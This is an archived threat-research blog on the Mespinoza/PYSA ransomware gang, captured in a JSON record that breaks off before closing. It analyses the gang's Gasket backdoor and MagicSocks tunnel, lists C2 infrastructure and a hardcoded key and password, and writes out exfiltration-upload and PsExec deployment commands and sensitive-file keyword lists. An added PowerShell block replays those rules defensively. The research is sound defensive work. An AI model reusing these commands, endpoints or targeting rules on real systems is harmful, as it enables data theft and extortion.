{
	"id": "f4b204dc-0d2c-4e45-9fb0-86f526c72452",
	"created_at": "2026-04-06T00:08:14.909567Z",
	"updated_at": "2026-04-10T03:19:59.189818Z",
	"deleted_at": null,
	"sha1_hash": "dbcc4e49360b245b8cbdfe54aed9bda18ce879a1",
	"title": "Mespinoza Ransomware Gang Calls Victims “Partners,” Attacks with Gasket, \"MagicSocks\" Tools",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2409916,
	"plain_text": "Mespinoza Ransomware Gang Calls Victims “Partners,” Attacks with\r\nGasket, \"MagicSocks\" Tools\r\nBy Robert Falcone, Alex Hinchliffe, Quinn Cooke\r\nPublished: 2021-07-15 · Archived: 2026-04-05 13:50:59 UTC\r\nExecutive Summary\r\nAs cyber extortion flourishes, ransomware gangs are constantly changing tactics and business models to increase the\r\nchances that victims will pay increasingly large ransoms. As these criminal organizations become more sophisticated, they\r\nare increasingly taking on the appearance of professional enterprises. One good example is Mespinoza ransomware, which is\r\nrun by a prolific group with a penchant for using whimsical terms to name its hacking tools.\r\nOur Unit 42 cybersecurity consultants have observed the gang attacking U.S. publishing, real estate, industrial\r\nmanufacturing and education organizations with ransom demands as high as $1.6 million and payments as high as $470,000.\r\nThe FBI recently published an alert about the group, also known as PYSA, following a hacking spree on K-12 schools,\r\ncolleges, universities and even seminaries in the United States, as well as the United Kingdom.\r\nTo learn more about this group, we monitored its infrastructure — including a command and control (C2) server it uses to\r\nmanage attacks and a leak site where it posts data of victims who refused to pay large ransoms. Here are some of our key\r\nfindings on the Mespinoza gang:\r\nExtremely Disciplined: After accessing a new network, the group studies compromised systems in what we believe is triage\r\nto determine whether there’s enough valuable data to justify launching a full-scale attack. They look for keywords including\r\nclandestine, fraud, ssn, driver*license, passport and I-9. 
That suggests they are hunting for sensitive files that would have the\r\nmost impact if leaked.\r\nTargets Many Industries: Victim organizations are referred to as “partners.” Use of that term suggests that they try to run\r\nthe group as a professional enterprise and see victims as business partners who fund their profits. The gang’s leak site\r\nprovided data it claims belong to 187 victim organizations in industries including education, manufacturing, retail, medical,\r\ngovernment, high tech, transportation and logistics, engineering and social services, among others.\r\nHas Global Reach: 55 percent of victims identified on the leak site are in the United States. The rest are scattered across the\r\nglobe in more than 20 countries including Canada, Brazil, United Kingdom, Italy, Spain, France, Germany, South Africa and\r\nAustralia.\r\nIs Cocky When Approaching Victims: A ransom note offers this advice: “What to tell my boss?” “Protect Your System,\r\nAmigo.”\r\nUses Attack Tools with Creative Names: A tool that creates network tunnels to siphon off data is called “MagicSocks.” A\r\ncomponent stored on their staging server and likely used to wrap up an attack is named “HappyEnd.bat.”\r\nPalo Alto Networks Next-Generation Firewall customers are protected from this threat with DNS Security, Threat\r\nPrevention, Advanced URL Filtering and WildFire security subscriptions. Customers are also protected with Cortex XDR\r\nand can use AutoFocus for tracking related entities. Cortex Xpanse customers can assess and manage their network security\r\nattack surface and inventory their systems. 
Full visualization of the techniques observed and their relevant courses of action\r\ncan be viewed in the Unit 42 ATOM Viewer.\r\nAccessing Networks via RDP\r\nWe’ve responded to incidents where the ransomware operators use Remote Desktop Protocol (RDP) to access the impacted\r\norganization’s network and make use of various open-source and built-in system tools to aid lateral movement and credential\r\ngathering. The operators leverage double-extortion tactics — exfiltrating data prior to deploying the ransomware so they can\r\nlater threaten to leak it — and install a new backdoor, which we call Gasket (based on the malware’s code), to maintain access to\r\nthe network. Gasket also references a capability called “MagicSocks,” which uses the open-source Chisel project to create\r\ntunnels for continued remote access to the network.\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 1 of 23\n\nWe’ve observed the Mespinoza ransomware gang exfiltrating files whose filenames match a list of keywords to a remote\r\nserver prior to installing the ransomware via a PowerShell script. The keywords include the sub-strings “secret,” “fraud”\r\nand “SWIFT,” which suggests the actors sought to gather and exfiltrate sensitive files that would have the most impact on\r\nthe organization if the actors released the files to the public. At the time of this writing, the gang’s leak site named and\r\nprovided information on 187 organizations in various industries globally.\r\nFigure 1. Mespinoza victimology by country.\r\nFigure 2. 
Mespinoza victimology by industry.\r\nIn many of the descriptions, the actor refers to the impacted organization as their “partner.” We suspect that Mespinoza uses\r\nthe term because they view their operations as a professional enterprise and their “partners” as business partners funding\r\ntheir business.\r\nThe Gasket and MagicSocks tools, as well as the exfiltrated data on the leaked site, date back to April 2020, which suggests\r\nthe Mespinoza ransomware gang has been active for more than a year. While there are reports suggesting that the Mespinoza\r\nransomware gang has adopted a Ransomware-as-a-Service (RaaS) model, we have not observed this behavior from the\r\ngroup based on the ransomware cases we’ve investigated.\r\nGasket\r\nDuring our analysis of a Mespinoza ransomware incident, we observed the threat actors installing a backdoor written in the\r\nGo language on the system prior to the distribution of the ransomware. According to a report published by France’s National\r\nAgency for the Security of Information Systems (ANSSI), ANSSI also observed threat actors delivering the Mespinoza\r\nransomware using a payload written in Go. 
We analyzed the Go sample mentioned in the ANSSI report and found that it was\r\nan earlier, unobfuscated version of the same tool we observed in our case.\r\nThe developers of Gasket wrote this backdoor in Golang and used the open-source Gobfuscate tool to obfuscate the payload.\r\nWe call this tool Gasket because the variant of this tool mentioned in the ANSSI report (SHA256:\r\n9986b6881fc1df8f119a6ed693a7858c606aed291b0b2f2b3d9ed866337bdbde), designated as version “001,” called the\r\nfollowing two functions to carry out its command and control (C2) communications:\r\nmain.checkGasket\r\nmain.connectGasket\r\nWe believe that the actors use this backdoor as a backup to RDP to maintain access to the network.\r\nGasket parses the command line arguments passed to it to determine whether it should run as a standalone process (no\r\ndaemon mode), install itself as a service (daemon mode, no command line arguments) or control a previously installed\r\nGasket service. Gasket supports the following command line arguments:\r\nno-persist\r\nservice Restart|Install|Start|Run\r\nWhen attempting to install itself as a daemon, Gasket will create a service and run its functional code. The following service\r\nnames have been extracted from the known Gasket samples:\r\nAzureAgentController\r\nCorpNativeHostDebugger\r\nDefenderSecurityAgent\r\nGetServiceController\r\nJavaJDBC\r\nMicrosoftSecurityManager\r\nMicrosoftTeamConnect\r\nMicrosoftTeamConnectDebugger\r\nMicrosoftTeamManager\r\nMsStudioAgentUpdateService\r\nWindowsHealthSubSystem\r\nWindowsManagementSystem\r\nWindowsProtectionSystem\r\nWindowsSoftwareManager\r\nWindowsSoftwareManagerDebugger\r\nCommand and Control\r\nMost versions of Gasket come equipped with a primary C2 communication channel, as well as a second fallback\r\nchannel. 
Early versions of Gasket relied only on HTTP-based C2 communications using IP addresses for its servers, while\r\nlater versions use the same HTTP-based C2 channel as a fallback and rely mainly on a DNS tunneling C2 channel. The DNS\r\ntunneling protocol uses DNS TXT queries and is based on an open source project called Chashell. For instance, the\r\nfollowing DNS TXT query was issued by Gasket:\r\n98ca192722ba28e9b8fb34b0d789a00608a13aac2e8d5b420b8e2ae899777a4.5c91a5a50ca31d47ed0d1dbbd0b7d0633b8f80d00eae16b6b1e6e326\r\nTo understand the outbound DNS queries issued by Gasket, we analyzed Chashell’s server to determine how it processes the\r\ninbound DNS queries and to understand how the server constructs its responses. The Chashell C2 server will take the\r\nsubdomain up to the fully qualified domain name for the C2 (transnet[.]wiki from above) and join the subdomain labels\r\ntogether with the periods removed. The server then decrypts the resulting data using XSalsa20 and Poly1305, and the\r\ncleartext is treated as a serialized protobuf message. All Gasket samples that use the DNS tunneling C2 channel based on\r\nChashell use the same key, 37c3cb07b37d43721b3a8171959d2dff11ff904b048a334012239be9c7b87f63, to decrypt the\r\ndata transferred.\r\nAccording to Chashell's GitHub, the chacomm.proto file describes the protobuf message structure that the server will use to\r\nparse the decrypted data received from Gasket and how it will structure its response. The structure of the message includes a\r\nclientguid field that is a GUID unique to the compromised host and either a ChunkStart, ChunkData, PollQuery or\r\nInfoPacket packet type. 
The structure of each packet type varies, but the following table describes each packet type's\r\npurpose:\r\nPacket Type | Description\r\nInfoPacket | Initial beacon that provides the compromised system's hostname to the C2.\r\nChunkStart | Provides a chunk identifier and tells the C2 how many DNS queries will be required to send the data.\r\nChunkData | Includes the chunk identifier, the current chunk and the data, so the C2 can reconstruct the uploaded data.\r\nPollQuery | Acts as a heartbeat to keep the session alive, but is also used as the query type to get data from the C2.\r\nTable 1. Description of Chashell's different packet types.\r\nThe C2 will respond to these queries with hexadecimal formatted data within the TXT answer, which is a serialized protobuf\r\nthat uses the same message structure from Chashell’s chacomm.proto file. The following example shows the DNS requests\r\nand responses and the contents of the messages necessary to send data from the Chashell server to the Gasket payload via\r\nthe DNS tunneling C2 channel:\r\nFigure 3. Example DNS request and response flow of Chashell.\r\nUnfortunately, Gasket would not run the hostname data provided via the Chashell server above as a command, as there’s a\r\nsub-protocol and a command handler used by Gasket to determine how to handle the server’s response, which we will\r\ndiscuss in the next section. Gasket also uses a sub-protocol in addition to Chashell's DNS tunneling protocol for its DNS\r\nrequests, which prepends a message type followed by encrypted data to notify the C2 of the type of message. This suggests\r\nthat the actors had modified the Chashell server code to support this modified communication channel. 
The following\r\nmessage types are available:\r\nMessage Type | Description\r\n1 | Initial check-in structured as \u003cversion number\u003e///\u003cencoded computer and user name\u003e///\u003ccomputer name\u003e///\u003cuser name\u003e\r\n2 | Heart-beat \u003cversion number\u003e///\u003cencoded computer and user name\u003e\r\n9 | Data sent including output and debug messages\r\nTable 2. Description of Gasket's sub-protocol message types.\r\nAs previously mentioned, many Gasket versions also have an HTTP-based backup C2 channel that they will use if the domains\r\nused in the DNS tunneling channel are inaccessible. The payload will issue HTTP requests directly to IP addresses, which\r\ndoes not require any DNS requests to operate. To support this backup channel, the payload includes a list of IP addresses\r\nhardcoded as four two-byte values per address; the payload decodes each address by subtracting 10 from each two-byte value and\r\nuses the results to build the dot notation IP address. For instance, the bytes 37 00 9D 00 EF 00 27 00 in the binary would\r\nresult in a list of 0x37, 0x9d, 0xef and 0x27, each of which have 10 subtracted from them to produce 0x2d, 0x93, 0xe5 and\r\n0x1d, which results in 45, 147, 229 and 29. These values are then joined with a \".\" character to make the dot notation IP of\r\n45.147.229[.]29. A full list of known HTTP-based Gasket C2 servers is available in Table 5, as well as the Indicators of\r\nCompromise (IOCs) section of this blog.\r\nThe initial beacon sent via the HTTP C2 channel involves a POST request to the URL /cert/trust. The POST request uses the\r\ndefault Go-http-client/1.1 user-agent and includes encrypted data that will look like the following:\r\nFigure 4. 
Example Gasket initial beacon communication.\r\nThe data in the HTTP POST requests are encrypted with a rolling XOR algorithm, using the string dick as a key. The data\r\nwithin the initial beacon to /cert/trust contains a hardcoded version number 021, a unique identifier for the system (MD5\r\nhash or base64 encoded string), the computer name and user name delimited by /// as seen in the following:\r\n021///15c50b724a801417ef4143bb58b7178b///\u003ccomputer name\u003e///\u003cuser name\u003e\r\nAfter the initial beacon, Gasket sends supplemental requests to a URL of /time/sync to obtain commands from the threat\r\nactor, which will look like the following:\r\nFigure 5. Example Gasket supplemental requests.\r\nThese follow-up requests to /time/sync use the same XOR algorithm and key, and the resulting data includes just the first two\r\nfields, specifically:\r\n021///15c50b724a801417ef4143bb58b7178b\r\nFor versions that have remote logging capabilities, Gasket sends HTTP POST requests to a URL of /cert/dist that looks like\r\nthe following:\r\nFigure 6. Example Gasket remote logging requests.\r\nThe remote logging request seen above uses the same XOR algorithm and key as in other HTTP requests. The structure of\r\nthe data differs slightly with the sent information, including the version number, the unique identifier for the system and\r\nfinally the message sent to the server as seen in the following example remote error log:\r\n002///\u003cbase64 username+computername\u003e///[Control]: Failed to Stop Windows Protection System: Unknown action Stop\r\nCapabilities\r\nThe response from the C2 server will provide /// delimited data that contains an integer that the payload will treat as a\r\ncommand, along with additional parameters for the commands. 
Table 3 below provides a list of the commands available in most Gasket versions, including the most recent (021).\r\nCommand | Description\r\n1 | Runs a command/application/powershell with os.exec.Command.Run, returns stdout.\r\n2 | Starts a SOCKS5 server using the rsocks project (https://github.com/brimstone/rsocks) to connect to a specified remote system.\r\n3 | Same as command 2.\r\n4 | Switches the C2 communications from DNS to HTTP or HTTP to DNS, depending on which channel was currently active.\r\n7 | Uses the Chisel project to create what it calls a \"MagicSocks\" client to port forward and tunnel traffic to a provided server using a provided username and 'networkZSA$789ty5' as a password for SSH.\r\n9 | Uninstalls the Trojan by deleting the service running the payload, creating %temp%\\del.bat to delete itself and calling os.Exit\r\nTable 3. Commands available in Gasket version 021.\r\nBased on the commands in Table 3, it appears that Gasket serves the threat actors not only as a backdoor, but also provides\r\ntunneling abilities to allow the actor to use Gasket as a means to tunnel traffic through to an externally controlled server.\r\nGasket references \"magicSocks\" within its debug logs when creating its tunnel, which appears to be a tunneling method\r\nusing the 'chisel' project. We have evidence that this threat actor has a standalone version of this tunneling tool, which we\r\ncall MagicSocks and will discuss in the next section.\r\nEvolution of Gasket\r\nWe alluded to several versions of Gasket in previous sections of this blog, but we only referenced 001 and 021 specifically.\r\nThese two version numbers mark the oldest and newest known versions of Gasket, which we observed from April 2020\r\nthrough March 2021. 
Table 4 provides a list of Gasket samples, their respective version number and the first\r\ntimestamp we have associated with the sample.\r\nTable 4. Known Gasket samples and their respective versions.\r\nWe extracted the C2 locations used by Gasket samples for both the HTTP-based and DNS-based channels for analysis. 
The\r\nhardcoded domains and IP addresses, seen in Table 5, are not unique to the version of Gasket, as several domains and IPs\r\nwere used in Gasket samples that had different version numbers.\r\nTable 5. C2 domains and IP addresses and their associated Gasket version.\r\nAs previously mentioned, we analyzed many Gasket backdoors and MagicSocks versions used by the threat actors and\r\ngathered a significant amount of related infrastructure for blocking and tracking purposes. 
The Maltego chart in Figure 7\r\nbelow helps to visualize the Gasket samples listed in Table 5 above, their versions and related infrastructure used for C2\r\ncommunications. Figure 7 below broadly shows two main clusters: the cluster on the left contains more recent versions (012 to 021)\r\nand the cluster on the right contains pre-012 versions.\r\nThe vast majority of links between entities shown in Figure 7 are related to infrastructure, namely domain names and IP\r\naddresses that respective samples connected to during our WildFire sandbox analysis, or could connect to, based on\r\nextracted C2 configuration information.\r\nFigure 7. Maltego diagram showing Gasket and MagicSocks infrastructure and links.\r\nThe links between some of the distinct clusters (highlighted by squares drawn over Figure 7) are limited and typically\r\ninvolve C2 reuse. However, some additional links were possible using sample meta-data, such as common Windows Service\r\nnames, as previously listed.\r\nUsing the heatmap (Figure 8 below), we were able to further visualize the amount of reuse and overlap present for the\r\nprimary C2 address in all Gasket samples. Generally speaking, the table shows that earlier versions of Gasket reused C2\r\naddresses the most, both for multiple variants of the same version and for different variants using newer Gasket\r\nversions. The heatmap shows later versions (from about 008 onwards) have a reduction in reuse of primary C2 addresses\r\nwithin and across versions, and in the latest versions, it seems primary C2 addresses are not being reused.\r\nFigure 8. Heatmap showing Gasket sample counts and versions against primary C2s.\r\nThe outliers to this pattern are rows 9, 11 and 12 in Figure 8 above. Rows 9 and 11 relate to the top right cluster in Figure 7\r\nwhile row 12 relates to the bottom right cluster. 
They are outliers because the Gasket versions are relatively old yet their C2\r\nreuse is nonexistent. Furthermore, the links in Figure 7 from the cluster including C2s listed on rows 9 and 11 to the rest of\r\nthe Gasket mapping lie only in the fact that they are known Gasket samples, and they share the same Windows Service\r\nname as other samples from other clusters. We believe these outliers could be due to specific campaigns involving Gasket\r\nmalware with bespoke attack infrastructure.\r\nWe see the most repetitive use of infrastructure in earlier versions of Gasket together with several changes to the name of the\r\nWindows Service created during infection. However, the latest Gasket versions, which appear to adopt more single-use and\r\nshort-lived infrastructure (at least for their primary C2s), use a consistent name for the Windows Service, namely JavaJDBC.\r\nFigure 7 also highlights an area of overlap between Gasket and the MagicSocks tool via the common IP address\r\n89.44.9[.]229, which hosted both Gasket (SHA256:\r\naa2faf0f41cc1710caf736f9c966bf82528a97631e94c7a5d23eadcbe0a2b586), the MagicSocks sample (SHA256:\r\nd49a69be32744e0af32ad622aa22ba480d68253287c99f5a888feb9f2409e46f) and some PowerShell components related to\r\nMagicSocks. The PowerShell script hashes and additional C2 addresses extracted from other MagicSocks samples are listed\r\nin the IOCs section later.\r\nMagicSocks\r\nThe Gasket tool referenced a proxying and tunneling capability known as MagicSocks, which is based on the open-source\r\nChisel project. The actors also created a standalone version of MagicSocks that they would use in addition to Gasket. The\r\nstandalone MagicSocks tool comes as a dynamic link library (DLL), which the actor also wrote in Golang. 
The developer of\r\nMagicSocks uses code from the Chisel project to tunnel traffic from the local system to an external actor-controlled Chisel\r\nserver. The tool will build the string R:0.0.0.0:50000:socks that it supplies to the Chisel client code that will generate the\r\nfollowing JSON that the client uses as a configuration:\r\n{\"Version\":\"0.0.0-src\",\"Remotes\":\r\n[{\"LocalHost\":\"0.0.0.0\",\"LocalPort\":\"50000\",\"RemoteHost\":\"\",\"RemotePort\":\"\",\"Socks\":true,\"Reverse\":true}]}\r\nThe tool also builds a string that represents the external actor-controlled Chisel server, which is hosted at:\r\nhttp://creatordampfe[.]xyz:443\r\nWhen running the MagicSocks tool, MagicSocks uses the Chisel client to connect to the Chisel server hosted at\r\ncreatordampfe[.]xyz. This starts with an HTTP request and response that will look like the following:\r\nFigure 9. Example MagicSocks initial request and response.\r\nThe purpose of using Chisel is to tunnel traffic out from the local system to creatordampfe[.]xyz, which acts as a proxy to\r\nthe true location of the outbound traffic. Unfortunately, we do not have access to the Chisel server at creatordampfe[.]xyz to\r\ndetermine the ultimate destination of the traffic, which highlights the hiding functionality that MagicSocks offers the actors.\r\nWe discovered five additional MagicSocks standalone samples, all compiled between February 2021 and April 2021. 
We\r\nextracted the location of the remote Chisel server from each of the five samples and found the following three unique C2\r\nlocations:\r\n104.168.164[.]195\r\n172.96.189[.]86\r\n142.79.237[.]163\r\nThese samples were also obfuscated with Gobfuscate, but earlier samples were compiled in the following location,\r\nwhich suggests they were created on a Linux system by a user named solar:\r\n/home/solar/c/go/magic-dll/src/sokos/\r\nOne of the MagicSocks standalone samples we discovered was delivered with and executed by another tool with a filename\r\nof run64.exe (SHA256: f2dcad28330f500354eb37f33783af2bcc22d205e9c3805fed5e919c6853649c). This tool does nothing\r\nmore than run the MagicSocks DLL (timex.dll), specifically calling the Debug exported function by running the following\r\nrundll32 command:\r\nC:\\Windows\\System32\\rundll32.exe \u003ccurrent directory\u003e\\timex.dll,Debug\r\nWe believe the same individual who created the MagicSocks samples also created this sample, as the Go project's source was in the\r\nfollowing folder, which has the same solar username:\r\n/home/solar/c/go/exec-dll/src/\r\nWe found another MagicSocks sample (SHA256:\r\nd49a69be32744e0af32ad622aa22ba480d68253287c99f5a888feb9f2409e46f) from September 2020, which was not\r\nobfuscated with Gobfuscate. This sample was hosted at 89.44.9[.]229/info.txt, which is the same IP that hosted the Gasket\r\nsample (SHA256: aa2faf0f41cc1710caf736f9c966bf82528a97631e94c7a5d23eadcbe0a2b586). This version of MagicSocks\r\nuses a socks5 library to create a proxy to a remote server, specifically 23.227.206[.]158:443. 
The 89.44.9[.]229 IP hosted\r\nother files of interest that we will discuss further in the related tools section of this blog.\r\nMespinoza Ransomware\r\nThe Gasket and MagicSocks tools were used in an attack that delivered the Mespinoza ransomware (also known as PYSA).\r\nAdditionally, based on analysis during incident response cases worked by Unit 42 consultants, other tools were discovered\r\nthat the operators used to facilitate the latter parts of their attacks, as described below.\r\nFor general reconnaissance of the network after the RDP breach, \"ADRecon\" was used to enumerate Active Directory for\r\ndomains, users, groups, computers and more. Furthermore, built-in Windows utilities such as quser, ping and net were used,\r\ntogether with downloaded tools Advanced IP Scanner and Advanced Port Scanner, to gather more information about logged-on users and network topologies. PowerShell scripts were used to wake up systems, turning them on over the network and\r\nproviding the operators with additional targets.\r\nTo gather credentials and facilitate lateral movement and ransomware deployment, the operators used PowerShell to recursively\r\nsearch the file system for logon credentials stored in text files and spreadsheets. The PowerShell tool \"SessionGopher\",\r\ncapable of extracting session information from remote access tools, such as WinSCP, PuTTY, FileZilla and more, was also\r\nused; the recovered sessions enabled lateral movement via RDP and the Microsoft Sysinternals utility PsExec.\r\nThe operators also used PowerShell scripts to kill security services and backups, and disable features of Windows Defender\r\nby editing local group policies.\r\nThe ransomware is fairly straightforward, as it enumerates the file system and encrypts files with an asymmetric cipher,\r\nrenames the files with a specific extension and displays a ransom message. 
The ransom message contains three email addresses that victims are to contact to discuss payment for decryption of the encrypted files. The ransom message also names the group’s leak site, where the actors say they will post sensitive files stolen from the network before the files were encrypted. The group evidently uses these files as leverage in negotiating payment.\r\nExfiltration\r\nPrior to deploying Mespinoza, the actors run a PowerShell script that exfiltrates potentially sensitive files from the compromised network, both as a double-extortion attempt and to increase their leverage in ransom negotiations. According to the ransom message shown later in this blog, the actors threaten to upload these files to their website or sell them on the ‘darknet’ if the organization does not pay the ransom. The message suggests the actors use the exfiltrated files to increase the likelihood that the organization pays.\r\nWe visited the group’s leak site and found that the actors had leaked archives of files supposedly exfiltrated from victim networks. Each leak entry on the website includes the name of the organization, a date associated with the leak and a link to either a page hosting the leaked information or a Zip archive of files. At the time of this writing, 187 organizations were named, with leak dates ranging from April 3, 2020 through April 29, 2021. The website also includes a description of the leaked files for 25 of the organizations, apparently written by the actor. 
In many of the descriptions, the actor refers to the impacted organization as their “partner,” as in the following example description:\r\nOur partners provide you with their transaction history, invoices and bank documents for viewing.\r\nDuring our analysis, we observed the actors collecting potentially sensitive files by running a PowerShell script that enumerates files on the system, ignores files with specific extensions and files in specific folders, and sends any file whose name contains one of 71 substrings. When a file of interest is found, the script uses the System.Net.WebClient.UploadFile method to upload it to a URL with the following structure:\r\n193.34.166[.]92/upload-wekkmferokmsdderiuheoirhuiewiwnijnfrer?token=\u003cbase64 token value\u003e\u0026id=\u003cunique number for organization\u003e\u0026fullPath=\u003cpath on disk of exfiltrated file\u003e\r\nThe script identifies files of interest by comparing the filename to the 71 substrings listed in Table 6. The substrings suggest the actors are interested in gathering a variety of information, including documents related to finances, account credentials, government, employees and other personally identifiable information (PII). 
Several of the substrings, such as illegal, fraud and criminal, suggest that the actors are also interested in illegal activity known to the organization.\r\nsecret, checking, illegal, bureau, billing, sec, private, saving, compromate, government, payment, soc, confident, routing, privacy, securit, budget, vendor, important, finance, login, unclassified, criminal, tax, federal, agreement, credent, seed, bank, emplo, government, SWIFT, private, personal, cash, hir, security, compilation, contract, partner, payroll, ssn, fraud, report, concealed, confident, password, tax, secret, confident, clandestine, mail, driver*license, i-9, balance, hidden, investigation, letter, license*driver, w-9, statement, clandestine, federal, passport, scans, w-4, pay, Staf, SSA, Emplo, Confid\r\nTable 6. Substrings used to identify files of interest to exfiltrate (71 entries, reproduced as listed; several appear more than once).\r\nWhen generating the list of files to exfiltrate, the PowerShell script disregards files whose extension matches the list in Table 7. The exclusion list hints at which file types the threat actors were most interested in: it does not include common productivity extensions such as “.docx,” “.doc” and “.pdf.” We believe the actors are most interested in document files, as they are more likely to contain the sensitive information the actors seek than the file types in the exclusion list. There are also errors in the exclusion list, specifically the “. rpt” entry, which contains a space character that is not allowed in a file extension.\r\n.png, .evtx, .gif, .man, .pls, .trn, .ascx, .suo, .jss, .jpg, .rb, .log, .template, .checksum, .ipa, .application, .vsix, .jsm, .txt, .htm*, .url, .xsd, .cdf-ms, .procedure, .cls, .wsdl, .ico, .py, .jar, .lnk, .aspx, .cmd, .vb, .deploy, .tt, .function, .pyc, .dat, .cs, .h, . rpt, .cshtml, .DIC, .cch, .hlp, .dll, .ini, .json, .cab, .php, .config, .rll, .chw, .ldf, .exe, .xrm-ms, .bak, .Pid, .svc, .chm, .so, .epub, .map, .js, .xml, .md, .frm, .java, .msp, .table, .form, .mof, .css, .swf, .manifest, .msi, .class, .msm, .tmp, .function, .mp3, .msg, .nupkg\r\nTable 7. File extensions ignored in identifying files of interest (reproduced as listed, including the malformed “. rpt” entry).\r\nLastly, the PowerShell script ignores files stored in folders and subfolders whose path contains one of the substrings listed in Table 8. These folders are omitted because they belong to the Windows operating system, application files, browsers and antivirus products, and are unlikely to contain sensitive files of interest to the actors.\r\nWindows, Package Cache, PerfLogs, Symantec, VMware, Recovery, Chrome, Microsoft, Boot, Mozilla, Sophos, Program Files, ESET, System Volume Information, ProgramData\r\nTable 8. Folders ignored in identifying files of interest.\r\nDeployment\r\nTo deploy Mespinoza, the actor used three batch scripts that use PsExec to copy files to, and run commands on, other systems on the network. The actors use one system as a distribution point and run the three batch scripts from it to spread to the other systems. The three scripts carry out the following tasks:\r\n1. Use PsExec to run a PowerShell script located in a shared folder on the distribution server.\r\n2. Use PsExec to run the copy command, copying the Mespinoza ransomware from the shared folder on the distribution server to C:\\Windows\\Temp\\svchost.exe on the other systems.\r\n3. Use PsExec to run the copied ransomware sample with cmd /c c:\\windows\\temp\\svchost.exe\r\nThe initial PowerShell script is meant to precede the ransomware deployment, specifically to disable antivirus, enable remote desktop and modify the system to maximize the impact of the ransomware.\r\n
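\r\nThe selection rules above (Tables 6 to 8) can be replayed defensively to scope what an exfiltration run would have taken from a file share, and the upload URL gives a network-side signature. The following PowerShell is an added example, not the actors' script or code from the Unit 42 post: the lists are transcribed from the tables with Table 6 duplicates dropped, the matching semantics (case-insensitive substring on the file name, with \"*\" read as a wildcard) are an assumption, and the sample tree and URL are constructed. Nothing is uploaded.\r\n```powershell\r\n# Added example (not the actors' script): replay the exfiltration script's selection rules\r\n# over a directory tree and check a URL for the shape of the upload endpoint. Lists are\r\n# transcribed from Tables 6 to 8; wildcard/substring semantics are an assumption.\r\n$Keywords = @(\r\n    'secret','checking','illegal','bureau','billing','sec','private','saving','compromate','government',\r\n    'payment','soc','confident','routing','privacy','securit','budget','vendor','important','finance',\r\n    'login','unclassified','criminal','tax','federal','agreement','credent','seed','bank','emplo',\r\n    'SWIFT','personal','cash','hir','security','compilation','contract','partner','payroll','ssn',\r\n    'fraud','report','concealed','password','clandestine','mail','driver*license','i-9','balance','hidden',\r\n    'investigation','letter','license*driver','w-9','statement','passport','scans','w-4','pay','Staf','SSA','Confid'\r\n)\r\n$ExcludedExtensions = @(\r\n    '.png','.evtx','.gif','.man','.pls','.trn','.ascx','.suo','.jss','.jpg','.rb','.log','.template','.checksum',\r\n    '.ipa','.application','.vsix','.jsm','.txt','.htm*','.url','.xsd','.cdf-ms','.procedure','.cls','.wsdl','.ico',\r\n    '.py','.jar','.lnk','.aspx','.cmd','.vb','.deploy','.tt','.function','.pyc','.dat','.cs','.h','. rpt','.cshtml',\r\n    '.DIC','.cch','.hlp','.dll','.ini','.json','.cab','.php','.config','.rll','.chw','.ldf','.exe','.xrm-ms','.bak',\r\n    '.Pid','.svc','.chm','.so','.epub','.map','.js','.xml','.md','.frm','.java','.msp','.table','.form','.mof',\r\n    '.css','.swf','.manifest','.msi','.class','.msm','.tmp','.mp3','.msg','.nupkg'\r\n)\r\n$ExcludedFolders = @('Windows','Package Cache','PerfLogs','Symantec','VMware','Recovery','Chrome','Microsoft',\r\n    'Boot','Mozilla','Sophos','Program Files','ESET','System Volume Information','ProgramData')\r\n\r\nfunction Test-MespinozaTarget {\r\n    param([Parameter(Mandatory)][System.IO.FileInfo]$File)\r\n    # Folder exclusion (Table 8): any directory component containing one of the substrings.\r\n    foreach ($f in $ExcludedFolders) { if ($File.DirectoryName -like \"*$f*\") { return $false } }\r\n    # Extension exclusion (Table 7); \".htm*\" acts as a wildcard and \". rpt\" can never match.\r\n    foreach ($e in $ExcludedExtensions) { if ($File.Extension -like $e) { return $false } }\r\n    # Keyword match on the file name (Table 6).\r\n    foreach ($k in $Keywords) { if ($File.Name -like \"*$k*\") { return $true } }\r\n    return $false\r\n}\r\n\r\nfunction Get-MespinozaTargetedFiles {\r\n    param([Parameter(Mandatory)][string]$Root)\r\n    Get-ChildItem -Path $Root -Recurse -File | Where-Object { Test-MespinozaTarget -File $_ } |\r\n        Select-Object FullName, Length\r\n}\r\n\r\nfunction Test-MespinozaUploadUrl {\r\n    # Network-side check: an /upload-\u003crandom\u003e path carrying token, id and fullPath parameters.\r\n    # The host is deliberately not matched, since 193.34.166[.]92 may change between incidents.\r\n    param([Parameter(Mandatory)][string]$Url)\r\n    $u = [uri]$Url\r\n    $names = ($u.Query.TrimStart('?') -split '\u0026') | ForEach-Object { ($_ -split '=', 2)[0] }\r\n    $missing = @('token','id','fullPath') | Where-Object { $names -notcontains $_ }\r\n    return ($u.AbsolutePath -match '^/upload-[a-z]+$') -and (-not $missing)\r\n}\r\n\r\n# Constructed sample tree. Run from a user profile: a temp path under C:\\Windows would\r\n# itself be excluded by the folder rule.\r\n$root = Join-Path ([System.IO.Path]::GetTempPath()) 'pysa-scope-demo'\r\nNew-Item -ItemType Directory -Force -Path \"$root\\Finance\", \"$root\\ProgramData\\App\" | Out-Null\r\n'x' | Set-Content \"$root\\Finance\\2020 payroll.xlsx\"       # keyword \"payroll\": targeted\r\n'x' | Set-Content \"$root\\Finance\\passport-scan.docx\"      # keyword \"passport\": targeted\r\n'x' | Set-Content \"$root\\Finance\\payroll-notes.txt\"       # .txt is excluded: skipped\r\n'x' | Set-Content \"$root\\ProgramData\\App\\password.cfg\"    # under ProgramData: skipped\r\n'x' | Set-Content \"$root\\Finance\\holiday photos.docx\"     # no keyword: skipped\r\nGet-MespinozaTargetedFiles -Root $root | Format-Table -AutoSize\r\n\r\n# Constructed proxy-log URL in the shape seen in the incident.\r\nTest-MespinozaUploadUrl -Url 'http://193.34.166.92/upload-wekkmferokmsdderiuheoirhuiewiwnijnfrer?token=dG9rZW4=\u0026id=17\u0026fullPath=C:\\Finance\\payroll.xlsx'\r\n```\r\nRun over a real share, the targeted-file list is a first-order estimate of what the actors would have uploaded. The order of checks matters: the folder and extension exclusions run before the keyword test, so a keyword hit inside an excluded tree is ignored, which matches the behaviour the text describes.\r\n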
